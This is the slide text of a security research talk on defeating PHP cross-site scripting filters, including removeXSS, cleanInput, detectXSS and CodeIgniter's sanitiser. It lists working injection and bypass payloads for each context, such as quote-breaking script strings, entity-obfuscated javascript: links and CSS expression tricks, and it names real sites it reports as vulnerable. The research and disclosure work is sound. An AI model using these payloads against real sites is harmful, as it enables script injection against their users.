On Breaking PHP-based cross-site scripting protection Mechanisms in the wild

A talk by Ashar Javed

@

Garage4Hackers WebCast (28-07-2014)

Previously presented at OWASP Spain Chapter Meeting

13-06-2014, Barcelona (Spain)

Recorded Webcast here

https://www.youtube.com/watch?v=TKn5qdti66c

monkey testing --- According to wikipedia

In computer science, a Monkey test (aka. Mark Testing) is a unit test that runs with no specific test in mind :)

http://en.wikipedia.org/wiki/Monkey_test

video summarizes everything about monkey testing ...

This talk is about ...

WHO AM I?

• A researcher in Ruhr University Bochum, RUB Germany
• A student of XSS who is working towards his PhD in XSS
  
• An XSSer /  An XSS Enthusiast                              
  
• Listed in top sites' hall of fame 
• A proud father of two
  
• Speaker @HITBKUL 2013, @DeepSec 2013, OWASP Seminar@RSA Europe 2013 and OWASP Spain 2014
• A Twitter lover @soaj1664ashar
  

Another reason for an xsser :)

Why I love XSS?

REASON # 1

Reason # 2

Reason # 3

agenda

why Hypertext Preprocessor (PHP)?

reason # 1

reason # 2

Reason # 3

reason # 4

Final reason (Top sites)

cross-site scripting (xss)

XSS according to OWASP

some statistics about xss

according to Prevoty CTO Kunal Anand

according to open source vulnerability database

According to OWASP top 10, 2013

According to google vulnerability reward program (vrp)

according to google trends

why you should care about XSS?

A recent example (traffic hijacking)

Persistent XSS Enables Large-Scale DDoS Attack

Another recent example i.e., #tweetbleed

tweetDeck's persistent XSS

but bleeding continue ...

ends up ...

getting bored ...

what if i told you :)

but how?

testing methodology

• Simulate Real Web Applications



• Testing conducted in five common contexts (HTML, Script, Attribute, Style & URL) unless context have been explicitly mentioned ...
  

what is context?

context definition

html context

e.g., http://www.ea.com/search?q=""xyz 

e.g., http://search.health.com/results.html?Ntt=""xyz

e.g., http://www.indiatimes.com/search/""xyz/

Attribute context

e.g., http://www.ea.com/search?q=""junk

e.g.,  http://www.ea.com/search?q=junk

e.g., http://www.drudgereportarchives.com/dsp/search.htm?searchFor=junk

script context

e.g., http://search.health.com/results.html?Ntt=xxxxxxxxxx

Double Quotes Case

e.g., http://www.dailymail.co.uk/home/search.html?sel=site&searchPhrase=xxxxxxxxxxxx

Single Quotes Case

e.g., http://www.indiatimes.com/search/xxxxxxxxxxxx/

xss in indiatimes ...

URL context

e.g., http://editor.froala.com/

e.g., http://www.tinymce.com/tryit/full.php

e.g., https://translate.twitter.com/forum/topics/5952/posts/new

Style Context

e.g., a screen-shot from ebay

live xss in ebay in style context

another xss in magento commerce in style context

summary of contexts

Attack Methodology

• Systematic in nature
• Easy to understand
• Context-Specific
• Attack methodology is `complete` and one can guarantee that there is an XSS or no XSS in a particular injection point.
• With the help of attack methodology,  one can make a secure per-context XSS sanitizer
  
• Can be applied to other server-side languages e.g., ASP, Ruby etc
  

script context attack methodology

Attacker may also used single line comment in order to make closing quote's affect null & Void

"; confirm(1); //

OR

'; confirm(1); //

live demo

http://de.eonline.com/search?query="xxxxxxxx

live demo

http://www.cracked.com/

Question arise ...

Why no sort of encoding in script-context attack methodology?

answer

It simply does not work. Encoding will not help you in breaking the script context unless developers are doing some sort of explicit decoding.

Better to avoid explicit decoding but I saw developers are doing explicit decoding e.g., see my short post on Yahoo Web Analytic XSS

https://twitter.com/soaj1664ashar/status/460346852580139008

and see my write-up on XSS in alexa.com

http://issuu.com/mscasharjaved/docs/urlwriteup

demo shows encoding does not help you in breaking the script context

Does it mean encoding not work in script context?

The answer is "NO". It works but does not help in breaking the context.

see demo: http://jsfiddle.net/TM679/5/

json context (script)

http://xssplaygroundforfunandlearn.netai.net/series7.html

solution

take it as an exercise ....

Attribute Context attack methodology

yahoo email Was vulnerable to an xss in an attribute context

live demo

http://www.drudgereportarchives.com/dsp/search.htm

3rd step of attribute context attack methodology

``onmouseover=alert(1)

`` === back tick

`` trick discovered by Yosuke HASEGAWA

ie8 treats back tick `` as a valid separator for attribute & attribute's value

Very useful in breaking attribute context if site is properly filtering single and double quotes

noted in HTML5 Security Cheat sheet http://html5sec.org/ by

Mario Heiderich

https://twitter.com/0x6D6172696F

Another useful tool by him is

http://html5sec.org/innerhtml/

and

must read research paper by him if you are interested in innerHTML and mutation XSS

http://www.nds.rub.de/media/emma/veroeffentlichungen/2013/12/10/mXSS-CCS13.pdf

back tick `` demos tested on Microsoft Windows XP + IE8 and tool used for testing is http://html5sec.org/innerhtml/

`` in action demo # 1

`` in action demo # 2

`` in action demo # 3

github https://github.com/ is vulnerable to innerhtml based xss

github respoNse on my report

tinymce was also vulnerable to innerhtml based xss

who is using tinymce?

Is innerHTML (i.e., ``) based XSS is exploitable?

question arise: who cares about ie8?

ie8 still haD 22% market share

why no encoding in AN attribute context attack methodology?

see demo http://jsfiddle.net/9t8UM/3/

example where encoding helps ...

story of YWA XSSes

XSSes in ywa worth 750$

style context attack methodology

remember 1000$ XSS challenge ...

http://demo.chm-software.com/7fc785c6bd26b49d7a7698a7518a73ed/

xss attack attempts ...

78188 XSS attack attempts from 1035 unique IP addresses and no bypass ...

implementation of a generic style context cleaner

questions you might be thinking ...

feature of style context cleaner ...

It allows CSS styles ...

stylish xss in magento (worth 1000$)

URL context attack methodology

stored xss in twitter translation in url context even in the presence of content security policy (CSP)

xss in magento commerce in url context (data uri)

Evaluation of Attack Methodology

php built-in functions that developers are using in the wild

summary of bypasses

customized xss solutions

features of removexss()

Two arrays of black-listed keywords :)

html context bypassES of removexss()

http://xssplayground.net23.net/clean.html

<input type=text oninput=alert(1)>

<form action=ja&Tab;vasc&NewLine;ript&colon;alert&lpar;1&rpar;><button type=submit>

Attribute context bypasses of removexss()

All event handlers that are not part of black-listed array will bypass this protection e.g.,

onpopstate
onstorage

I tweeted about that and you will see lots of bypasses by fellow researchers

https://twitter.com/soaj1664ashar/status/470843406521237504

style context bypass of removexss()

width:ex/**/pression(alert(1))

URL context bypass of removexss()

ja&Tab;vasc&NewLine:ript&colon;alert&lpar;1&rpar;

script context bypass of removexss()

&#x27;; confirm(1); &#x27;

&#39;; confirm(1); &#39;

why so popular?

published at http://css-tricks.com

features of cleaninput()

html context bypasses of cleaninput()

http://xssplayground.net23.net/clean1.html

<img src=x id=confirm(1) onerror=eval(id)

<iframe/src=javascript:confirm%281%29

for other contexts ... It should be :)

it performs well for cases like:

but remember the 3rd step of style context attack methodology ...

Here is the bypass :)

width:expression&#x28;alert&#x28;1&#x29;&#x29;

Another popular customized XSS protection solution.

http://xssplayground.net23.net/clean3.html

why popular?

Symphony CMS

A popular XSLT-powered open source content management system is using detectXSS() function.

according to http://www.getsymphony.com/

features of detectxss()

html context bypass of detectxss()

for other contexts ...

summary of bypasses

php-based web application frameworks

codeigniter

A Fully Baked PHP Framework

http://ellislab.com/codeigniter

codeigniter bypasses

https://github.com/EllisLab/CodeIgniter/issues/2667

feature of codeigniter

Disallowed JavaScript in Links & Image Tags (Snapshot from the latest CodeIgniter version available at GitHub)

https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L438

before my bypass link javascript removal feature's regular expression looks like

test-bed related to old codeigniter before i started bypassing

http://xssplayground.net23.net/clean11.html

who is willing to bypass this? :)

bypass # 1, only forward slash (/) is enough to bypass the regular expression :)

<a/href=ja&Tab;vasc&NewLine;ript&colon;confirm(1)>clclick</a>

http://xssplayground.net23.net/clean11.html (old test-bed)

http://xssplayground.net23.net/clean100.html (new test-bed)

another feature of codeigniter

Sanitize Naughty HTML elements

Old list of naughty elements before I started bypassing ...

bypass # 2 (use of math tag and it is firefox specific bypass)

<math><a/xlink:href=javascript&colon;confirm(1)>click</a>

http://xssplayground.net23.net/clean11.html (old test-bed)

http://xssplayground.net23.net/clean100.html (new test-bed)

new/updated list of naughty elements

old codeigniter had no support for html5 entities like &Tab;, &COLON; and &Newline; 

I was making use of these entities in order to bypass CodeIgniter's black-listing ...

now they are supporting html5 entities

https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L592

yet another feature of codeigniter

Removes Invisible characters e.g., %00 i.e., NULL

the remove invisible feature was working fine but ...

one does not simply `commit` :)

developer replied

more XSS bypasses ...

VALID SEPARATORS IN DIFFERENT BROWSERS

VALID SEPARATORS IN DIFFERENT BROWSERS

http://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation

bypass # 3 \uC in action

bypass # 4 & 5

xss vector having all fuzz forms of whitespaces ...

important thing to remember as far as codeigniter is concerned ...

Only useful for HTML context ....

You should not use it for attribute, style, script and URL context.

https://github.com/EllisLab/CodeIgniter/issues/2667

initially developers were also not sure about codeigniter's usage

summary of bypasses

alexa top 100 sites

I surveyed top 10 sites from the following 10 categories ...

xss distribution in different categories (50 out of 100 are vulnerable)

injection distribution

my short write-up

conclusion

• Our large scale survey of PHP-based sanitisation routines shows SAD state of web security as far as XSS is concerned.
• The proposed attack and testing methodology is general and may be applied to other server-side languages.
• What if we automate this context-specific attack methodology and unleash automation tool on a large scale survey of deep web ... :)
  

special thanks

@padraicb            

@enygma             

@metromoxie